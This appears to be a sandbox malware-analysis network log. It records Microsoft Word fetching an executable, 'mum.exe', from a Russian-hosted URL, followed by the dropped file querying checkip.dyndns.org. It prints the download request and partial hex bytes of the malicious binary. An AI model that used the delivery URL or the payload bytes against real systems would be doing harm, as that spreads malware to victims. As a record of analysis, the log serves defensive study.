Aug 23, 2022 13:43:29.018554926 CEST	8.8.8.8	192.168.2.22	0xa50b	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:29.018554926 CEST	8.8.8.8	192.168.2.22	0xa50b	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:29.018554926 CEST	8.8.8.8	192.168.2.22	0xa50b	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:29.092278004 CEST	8.8.8.8	192.168.2.22	0x56f9	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)
Aug 23, 2022 13:43:29.092278004 CEST	8.8.8.8	192.168.2.22	0x56f9	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:29.092278004 CEST	8.8.8.8	192.168.2.22	0x56f9	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:29.092278004 CEST	8.8.8.8	192.168.2.22	0x56f9	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:29.092278004 CEST	8.8.8.8	192.168.2.22	0x56f9	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:29.092278004 CEST	8.8.8.8	192.168.2.22	0x56f9	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:56.611607075 CEST	8.8.8.8	192.168.2.22	0x17f4	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)
Aug 23, 2022 13:43:56.611607075 CEST	8.8.8.8	192.168.2.22	0x17f4	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:56.611607075 CEST	8.8.8.8	192.168.2.22	0x17f4	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:56.611607075 CEST	8.8.8.8	192.168.2.22	0x17f4	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:56.611607075 CEST	8.8.8.8	192.168.2.22	0x17f4	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:56.611607075 CEST	8.8.8.8	192.168.2.22	0x17f4	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:56.651561975 CEST	8.8.8.8	192.168.2.22	0x5607	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)
Aug 23, 2022 13:43:56.651561975 CEST	8.8.8.8	192.168.2.22	0x5607	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:56.651561975 CEST	8.8.8.8	192.168.2.22	0x5607	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:56.651561975 CEST	8.8.8.8	192.168.2.22	0x5607	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:56.651561975 CEST	8.8.8.8	192.168.2.22	0x5607	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:56.651561975 CEST	8.8.8.8	192.168.2.22	0x5607	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

f0705964.xsph.ru

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49171	141.8.192.151	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2022 13:42:48.336560965 CEST	0	OUT	GET /mum.exe HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: f0705964.xsph.ru Connection: Keep-Alive
Aug 23, 2022 13:42:48.425309896 CEST	2	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 23 Aug 2022 11:42:48 GMT Content-Type: application/octet-stream Content-Length: 829952 Last-Modified: Mon, 22 Aug 2022 22:52:30 GMT Connection: keep-alive ETag: "630408ae-caa00" Expires: Tue, 30 Aug 2022 11:42:48 GMT Cache-Control: max-age=604800 Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 99 06 04 63 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 a2 0c 00 00 06 00 00 00 00 00 00 ee c0 0c 00 00 20 00 00 00 e0 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 c0 0c 00 57 00 00 00 00 e0 0c 00 5c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 a0 0c 00 00 20 00 00 00 a2 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 5c 03 00 00 00 e0 0c 00 00 04 00 00 00 a4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0d 00 00 02 00 00 00 a8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 c0 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 86 0c 00 ac 39 00 00 03 00 00 00 53 00 00 06 d0 60 00 00 18 26 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7a 02 28 16 00 00 0a 02 03 7d 01 00 00 04 02 28 17 00 00 0a 6f 18 00 00 0a 7d 03 00 00 04 2a 00 1b 30 02 00 1b 00 00 00 01 00 00 11 02 7b 01 00 00 04 0a 06 1f fd 2e 04 06 17 33 0a 00 de 07 02 28 04 00 00 06 dc 2a 00 01 10 00 00 02 00 11 00 02 13 00 07 00 00 00 00 1b 30 04 00 fc 00 00 00 02 00 00 11 02 7b 01 00 00 04 0b 07 2c 0b 07 17 2e 66 16 0a dd e5 00 00 00 02 15 7d 01 00 00 04 02 16 7d 06 00 00 04 02 17 7d 07 00 00 04 02 1f fe 73 0a 00 00 06 6f 03 00 00 0a 7d 08 00 00 04 02 1f fd 7d 01 00 00 04 38 7f 00 00 00 02 02 7b 08 00 00 04 6f 02 00 00 0a 7d 09 00 00 04 02 02 7b 07 00 00 04 7d 02 00 00 04 02 17 7d 01 00 00 04 17 0a dd 86 00 00 00 02 1f fd 7d 01 00 00 04 02 7b 04 00 00 04 0d 02 09 17 59 7d 04 00 00 04 02 7b 04 00 00 04 2d 04 16 0a 2b 48 02 7b 07 00 00 04 0c 02 08 02 7b 06 00 00 04 58 02 7b 04 00 00 04 58 20 8d 3b e0 7c 02 7b 09 00 00 04 58 61 7d 07 00 00 04 02 08 7d 06 00 00 04 02 7b 08 00 00 04 6f 6b 00 00 06 3a 71 ff ff ff 02 28 04 00 00 06 2b 08 02 28 04 00 00 06 de 12 02 14 7d 08 00 00 04 16 0a de 07 02 28 02 00 00 06 dc 06 2a 01 10 00 00 04 00 00 00 f3 f3 00 07 00 00 00 00 6e 02 15 7d 01 00 00 04 02 7b 08 00 00 04 2c 0b 02 7b 08 00 00 04 6f 54 00 00 06 2a 1e 02 7b 02 00 00 04 2a 1a 73 19 00 00 0a 7a 00 32 02 7b 02 00 00 04 8c Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc @ @W\ H.text `.rsrc\@@.reloc@BH9S`&z(}(o}0{.3(0{,.f}}}so}}8{o}{}}}{Y}{-+H{{X{X ;\|{Xa}}{ok:q(+(}(n}{,{oT{*sz2{
Aug 23, 2022 13:42:48.425352097 CEST	3	IN	Data Raw: 2f 00 00 01 2a 00 00 00 13 30 02 00 3c 00 00 00 03 00 00 11 02 7b 01 00 00 04 1f fe 33 1d 02 7b 03 00 00 04 28 17 00 00 0a 6f 18 00 00 0a 33 0b 02 16 7d 01 00 00 04 02 0a 2b 07 16 73 01 00 00 06 0a 06 02 7b 05 00 00 04 7d 04 00 00 04 06 2a 1e 02 Data Ascii: /0<{3{(o3}+s{}(z(}(o}0`{,.%}}{}}}{{X}{@3}+{s
Aug 23, 2022 13:42:48.425389051 CEST	4	IN	Data Raw: 06 18 58 13 05 06 6f 48 00 00 06 18 59 13 06 06 6f 48 00 00 06 17 58 13 07 06 6f 48 00 00 06 17 59 13 08 07 15 31 30 11 07 15 31 2b 07 02 7b 19 00 00 04 2f 22 11 07 02 7b 19 00 00 04 2f 18 02 7b 16 00 00 04 07 11 07 28 21 00 00 0a 7b 2a 00 00 04 Data Ascii: XoHYoHXoHY101+{/"{/{(!{+,(101+{/"{/{(!{+,(101+{/"{/{(!{*+,(10
Aug 23, 2022 13:42:48.425430059 CEST	6	IN	Data Raw: 00 00 0a 26 02 06 7b 2f 00 00 04 28 1c 00 00 06 2a 00 00 00 03 30 02 00 49 00 00 00 00 00 00 00 02 16 7d 18 00 00 04 02 7b 15 00 00 04 6f 24 00 00 0a 6f 39 00 00 0a 02 14 7d 16 00 00 04 02 7b 1b 00 00 04 20 43 5d 11 41 28 96 00 00 06 6f 2f 00 00 Data Ascii: &{/(0I}{o$o9}{ C]A(o/{ C]A(o/n} }#(:(-Vs;!s;"02o<s;{ ,!{ } {~o+{~
Aug 23, 2022 13:42:48.425468922 CEST	7	IN	Data Raw: 04 16 6f 52 00 00 0a 6f 5f 00 00 06 7e 21 00 00 04 16 6f 52 00 00 0a 6f 61 00 00 06 7e 21 00 00 04 16 6f 52 00 00 0a 6f 63 00 00 06 73 5e 00 00 06 6f 41 00 00 0a 2a 00 00 00 13 30 02 00 26 00 00 00 10 00 00 11 03 2c 0b 02 7b 23 00 00 04 14 fe 03 Data Ascii: oRo_~!oRoa~!oRocs^oA0&,{#+,{#oC(S0sT}#{#sU}$(V{$2oW{$(sXoY"@"PAsZ([(\(] s^
Aug 23, 2022 13:42:48.425508022 CEST	9	IN	Data Raw: 01 0a 06 17 20 21 2c 7d df 66 65 66 66 65 66 65 66 65 9e 06 16 20 16 d1 d5 c2 66 66 65 66 65 65 66 66 65 9e 06 18 20 65 ac 21 87 66 66 65 65 66 66 65 66 65 9e 06 19 20 1d 3b cf 75 66 66 65 65 66 66 65 66 65 9e 20 44 86 c8 61 66 65 66 66 65 65 66 Data Ascii: !,}feffefefe ffefeeffe e!ffeeffefe ;uffeeffefe Dafeffeefefi ci+6bcaX_XaXXbcaXc_XaXX 3+X3}&}'(0e(p(2(p
Aug 23, 2022 13:42:48.425545931 CEST	10	IN	Data Raw: 00 0a 1f 3c 58 73 1d 00 00 0a 06 6f 61 00 00 06 06 6f 63 00 00 06 73 5e 00 00 06 6f 41 00 00 0a 38 b5 00 00 00 02 06 6f 5f 00 00 06 0b 12 01 28 28 00 00 0a 06 6f 5f 00 00 06 0b 12 01 28 2a 00 00 0a 1f 3c 59 73 1d 00 00 0a 06 6f 61 00 00 06 06 6f Data Ascii: <Xsoaocs^oA8o_((o_(<Ysoaocs^oA+xo_((<Xo_(soaocs^oA+;o_((<Yo_(soaocs^oA+0
Aug 23, 2022 13:42:48.425584078 CEST	12	IN	Data Raw: 5e 00 00 0a 6f 97 00 00 0a 02 7b 34 00 00 04 1b 6f 98 00 00 0a 02 7b 34 00 00 04 20 e2 5f 11 41 28 96 00 00 06 6f 2f 00 00 0a 02 7b 34 00 00 04 17 6f 99 00 00 0a 02 7b 34 00 00 04 02 fe 06 57 00 00 06 73 58 00 00 0a 6f 9a 00 00 0a 02 7b 35 00 00 Data Ascii: ^o{4o{4 _A(o/{4o{4WsXo{5=so{5 _A(od{5+s^o{5o{5 _A(o/{5o{5WsXo{6nso{6 _A(od
Aug 23, 2022 13:42:48.425621986 CEST	13	IN	Data Raw: 06 7d 3a 00 00 04 2b 25 02 28 7b 00 00 06 7d 3a 00 00 04 2b 18 02 28 7d 00 00 06 7d 3a 00 00 04 2b 0b 02 28 7f 00 00 06 7d 3a 00 00 04 2a 13 30 02 00 54 00 00 00 22 00 00 11 02 7b 3c 00 00 04 0b 07 0a 06 45 04 00 00 00 1c 00 00 00 29 00 00 00 02 Data Ascii: }:+%({}:+(}}:+(}:0T"{<E)+'(z}:+%(w}:+(x}:+(y}:0#(cE6P+N\|9%((aY(++L\|9%((aX(++2\|9
Aug 23, 2022 13:42:48.425657988 CEST	14	IN	Data Raw: 41 19 19 20 a2 00 00 00 73 b5 00 00 0a 6f b6 00 00 0a 02 7b 47 00 00 04 28 b8 00 00 0a 6f b9 00 00 0a 02 7b 47 00 00 04 20 be 01 00 00 1f fc 73 1d 00 00 0a 6f 1e 00 00 0a 02 7b 47 00 00 04 20 08 5e 11 41 28 96 00 00 06 6f 64 00 00 0a 02 7b 47 00 Data Ascii: A so{G(o{G so{G ^A(od{Gso{Gs^o{Go{G C]A(o/{Do{D(-o#{D ^A("A so{D(fo{D^s
Aug 23, 2022 13:42:48.486007929 CEST	16	IN	Data Raw: 28 96 00 00 06 7e 4c 00 00 04 6f ca 00 00 0a 0a 06 74 19 00 00 01 0b 07 2a 00 13 30 03 00 23 00 00 00 27 00 00 11 28 74 00 00 06 20 22 58 11 41 28 96 00 00 06 7e 4c 00 00 04 6f ca 00 00 0a 0a 06 74 19 00 00 01 0b 07 2a 00 13 30 03 00 23 00 00 00 Data Ascii: (~Lot0#'(t "XA(~Lot0#'(t WXA(~Lot0#'(t \XA(~Lot0#'(t AXA(~Lot*0#'(t vXA(

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49172	141.8.192.151	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2022 13:42:52.403650045 CEST	882	OUT	GET /mum.exe HTTP/1.1 Host: f0705964.xsph.ru Connection: Keep-Alive
Aug 23, 2022 13:42:52.464385033 CEST	884	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 23 Aug 2022 11:42:52 GMT Content-Type: application/octet-stream Content-Length: 829952 Last-Modified: Mon, 22 Aug 2022 22:52:30 GMT Connection: keep-alive ETag: "630408ae-caa00" Expires: Tue, 30 Aug 2022 11:42:52 GMT Cache-Control: max-age=604800 Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 99 06 04 63 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 a2 0c 00 00 06 00 00 00 00 00 00 ee c0 0c 00 00 20 00 00 00 e0 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 c0 0c 00 57 00 00 00 00 e0 0c 00 5c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 a0 0c 00 00 20 00 00 00 a2 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 5c 03 00 00 00 e0 0c 00 00 04 00 00 00 a4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0d 00 00 02 00 00 00 a8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 c0 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 86 0c 00 ac 39 00 00 03 00 00 00 53 00 00 06 d0 60 00 00 18 26 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7a 02 28 16 00 00 0a 02 03 7d 01 00 00 04 02 28 17 00 00 0a 6f 18 00 00 0a 7d 03 00 00 04 2a 00 1b 30 02 00 1b 00 00 00 01 00 00 11 02 7b 01 00 00 04 0a 06 1f fd 2e 04 06 17 33 0a 00 de 07 02 28 04 00 00 06 dc 2a 00 01 10 00 00 02 00 11 00 02 13 00 07 00 00 00 00 1b 30 04 00 fc 00 00 00 02 00 00 11 02 7b 01 00 00 04 0b 07 2c 0b 07 17 2e 66 16 0a dd e5 00 00 00 02 15 7d 01 00 00 04 02 16 7d 06 00 00 04 02 17 7d 07 00 00 04 02 1f fe 73 0a 00 00 06 6f 03 00 00 0a 7d 08 00 00 04 02 1f fd 7d 01 00 00 04 38 7f 00 00 00 02 02 7b 08 00 00 04 6f 02 00 00 0a 7d 09 00 00 04 02 02 7b 07 00 00 04 7d 02 00 00 04 02 17 7d 01 00 00 04 17 0a dd 86 00 00 00 02 1f fd 7d 01 00 00 04 02 7b 04 00 00 04 0d 02 09 17 59 7d 04 00 00 04 02 7b 04 00 00 04 2d 04 16 0a 2b 48 02 7b 07 00 00 04 0c 02 08 02 7b 06 00 00 04 58 02 7b 04 00 00 04 58 20 8d 3b e0 7c 02 7b 09 00 00 04 58 61 7d 07 00 00 04 02 08 7d 06 00 00 04 02 7b 08 00 00 04 6f 6b 00 00 06 3a 71 ff ff ff 02 28 04 00 00 06 2b 08 02 28 04 00 00 06 de 12 02 14 7d 08 00 00 04 16 0a de 07 02 28 02 00 00 06 dc 06 2a 01 10 00 00 04 00 00 00 f3 f3 00 07 00 00 00 00 6e 02 15 7d 01 00 00 04 02 7b 08 00 00 04 2c 0b 02 7b 08 00 00 04 6f 54 00 00 06 2a 1e 02 7b 02 00 00 04 2a 1a 73 19 00 00 0a 7a 00 32 02 7b 02 00 00 04 8c Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc @ @W\ H.text `.rsrc\@@.reloc@BH9S`&z(}(o}0{.3(0{,.f}}}so}}8{o}{}}}{Y}{-+H{{X{X ;\|{Xa}}{ok:q(+(}(n}{,{oT{*sz2{
Aug 23, 2022 13:42:52.464473009 CEST	885	IN	Data Raw: 2f 00 00 01 2a 00 00 00 13 30 02 00 3c 00 00 00 03 00 00 11 02 7b 01 00 00 04 1f fe 33 1d 02 7b 03 00 00 04 28 17 00 00 0a 6f 18 00 00 0a 33 0b 02 16 7d 01 00 00 04 02 0a 2b 07 16 73 01 00 00 06 0a 06 02 7b 05 00 00 04 7d 04 00 00 04 06 2a 1e 02 Data Ascii: /0<{3{(o3}+s{}(z(}(o}0`{,.%}}{}}}{{X}{@3}+{s
Aug 23, 2022 13:42:52.464493990 CEST	887	IN	Data Raw: 06 18 58 13 05 06 6f 48 00 00 06 18 59 13 06 06 6f 48 00 00 06 17 58 13 07 06 6f 48 00 00 06 17 59 13 08 07 15 31 30 11 07 15 31 2b 07 02 7b 19 00 00 04 2f 22 11 07 02 7b 19 00 00 04 2f 18 02 7b 16 00 00 04 07 11 07 28 21 00 00 0a 7b 2a 00 00 04 Data Ascii: XoHYoHXoHY101+{/"{/{(!{+,(101+{/"{/{(!{+,(101+{/"{/{(!{*+,(10
Aug 23, 2022 13:42:52.464514017 CEST	888	IN	Data Raw: 00 00 0a 26 02 06 7b 2f 00 00 04 28 1c 00 00 06 2a 00 00 00 03 30 02 00 49 00 00 00 00 00 00 00 02 16 7d 18 00 00 04 02 7b 15 00 00 04 6f 24 00 00 0a 6f 39 00 00 0a 02 14 7d 16 00 00 04 02 7b 1b 00 00 04 20 43 5d 11 41 28 96 00 00 06 6f 2f 00 00 Data Ascii: &{/(0I}{o$o9}{ C]A(o/{ C]A(o/n} }#(:(-Vs;!s;"02o<s;{ ,!{ } {~o+{~
Aug 23, 2022 13:42:52.464533091 CEST	889	IN	Data Raw: 04 16 6f 52 00 00 0a 6f 5f 00 00 06 7e 21 00 00 04 16 6f 52 00 00 0a 6f 61 00 00 06 7e 21 00 00 04 16 6f 52 00 00 0a 6f 63 00 00 06 73 5e 00 00 06 6f 41 00 00 0a 2a 00 00 00 13 30 02 00 26 00 00 00 10 00 00 11 03 2c 0b 02 7b 23 00 00 04 14 fe 03 Data Ascii: oRo_~!oRoa~!oRocs^oA0&,{#+,{#oC(S0sT}#{#sU}$(V{$2oW{$(sXoY"@"PAsZ([(\(] s^
Aug 23, 2022 13:42:52.464554071 CEST	891	IN	Data Raw: 01 0a 06 17 20 21 2c 7d df 66 65 66 66 65 66 65 66 65 9e 06 16 20 16 d1 d5 c2 66 66 65 66 65 65 66 66 65 9e 06 18 20 65 ac 21 87 66 66 65 65 66 66 65 66 65 9e 06 19 20 1d 3b cf 75 66 66 65 65 66 66 65 66 65 9e 20 44 86 c8 61 66 65 66 66 65 65 66 Data Ascii: !,}feffefefe ffefeeffe e!ffeeffefe ;uffeeffefe Dafeffeefefi ci+6bcaX_XaXXbcaXc_XaXX 3+X3}&}'(0e(p(2(p
Aug 23, 2022 13:42:52.464572906 CEST	892	IN	Data Raw: 00 0a 1f 3c 58 73 1d 00 00 0a 06 6f 61 00 00 06 06 6f 63 00 00 06 73 5e 00 00 06 6f 41 00 00 0a 38 b5 00 00 00 02 06 6f 5f 00 00 06 0b 12 01 28 28 00 00 0a 06 6f 5f 00 00 06 0b 12 01 28 2a 00 00 0a 1f 3c 59 73 1d 00 00 0a 06 6f 61 00 00 06 06 6f Data Ascii: <Xsoaocs^oA8o_((o_(<Ysoaocs^oA+xo_((<Xo_(soaocs^oA+;o_((<Yo_(soaocs^oA+0
Aug 23, 2022 13:42:52.464591026 CEST	893	IN	Data Raw: 5e 00 00 0a 6f 97 00 00 0a 02 7b 34 00 00 04 1b 6f 98 00 00 0a 02 7b 34 00 00 04 20 e2 5f 11 41 28 96 00 00 06 6f 2f 00 00 0a 02 7b 34 00 00 04 17 6f 99 00 00 0a 02 7b 34 00 00 04 02 fe 06 57 00 00 06 73 58 00 00 0a 6f 9a 00 00 0a 02 7b 35 00 00 Data Ascii: ^o{4o{4 _A(o/{4o{4WsXo{5=so{5 _A(od{5+s^o{5o{5 _A(o/{5o{5WsXo{6nso{6 _A(od
Aug 23, 2022 13:42:52.464608908 CEST	895	IN	Data Raw: 06 7d 3a 00 00 04 2b 25 02 28 7b 00 00 06 7d 3a 00 00 04 2b 18 02 28 7d 00 00 06 7d 3a 00 00 04 2b 0b 02 28 7f 00 00 06 7d 3a 00 00 04 2a 13 30 02 00 54 00 00 00 22 00 00 11 02 7b 3c 00 00 04 0b 07 0a 06 45 04 00 00 00 1c 00 00 00 29 00 00 00 02 Data Ascii: }:+%({}:+(}}:+(}:0T"{<E)+'(z}:+%(w}:+(x}:+(y}:0#(cE6P+N\|9%((aY(++L\|9%((aX(++2\|9
Aug 23, 2022 13:42:52.464621067 CEST	896	IN	Data Raw: 41 19 19 20 a2 00 00 00 73 b5 00 00 0a 6f b6 00 00 0a 02 7b 47 00 00 04 28 b8 00 00 0a 6f b9 00 00 0a 02 7b 47 00 00 04 20 be 01 00 00 1f fc 73 1d 00 00 0a 6f 1e 00 00 0a 02 7b 47 00 00 04 20 08 5e 11 41 28 96 00 00 06 6f 64 00 00 0a 02 7b 47 00 Data Ascii: A so{G(o{G so{G ^A(od{Gso{Gs^o{Go{G C]A(o/{Do{D(-o#{D ^A("A so{D(fo{D^s
Aug 23, 2022 13:42:52.524490118 CEST	898	IN	Data Raw: 28 96 00 00 06 7e 4c 00 00 04 6f ca 00 00 0a 0a 06 74 19 00 00 01 0b 07 2a 00 13 30 03 00 23 00 00 00 27 00 00 11 28 74 00 00 06 20 22 58 11 41 28 96 00 00 06 7e 4c 00 00 04 6f ca 00 00 0a 0a 06 74 19 00 00 01 0b 07 2a 00 13 30 03 00 23 00 00 00 Data Ascii: (~Lot0#'(t "XA(~Lot0#'(t WXA(~Lot0#'(t \XA(~Lot0#'(t AXA(~Lot*0#'(t vXA(

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49173	132.226.8.169	80	C:\Users\user\AppData\Roaming\mum.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2022 13:43:14.345360994 CEST	1745	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 23, 2022 13:43:14.637011051 CEST	1745	IN	HTTP/1.1 200 OK Date: Tue, 23 Aug 2022 11:43:14 GMT Content-Type: text/html Content-Length: 102 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.7</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49174	193.122.130.0	80	C:\Users\user\AppData\Roaming\mum.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2022 13:43:29.255486965 CEST	1747	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 23, 2022 13:43:29.372759104 CEST	1747	IN	HTTP/1.1 200 OK Date: Tue, 23 Aug 2022 11:43:29 GMT Content-Type: text/html Content-Length: 102 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.7</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49175	193.122.130.0	80	C:\Users\user\AppData\Roaming\mum.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2022 13:43:56.802113056 CEST	1748	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
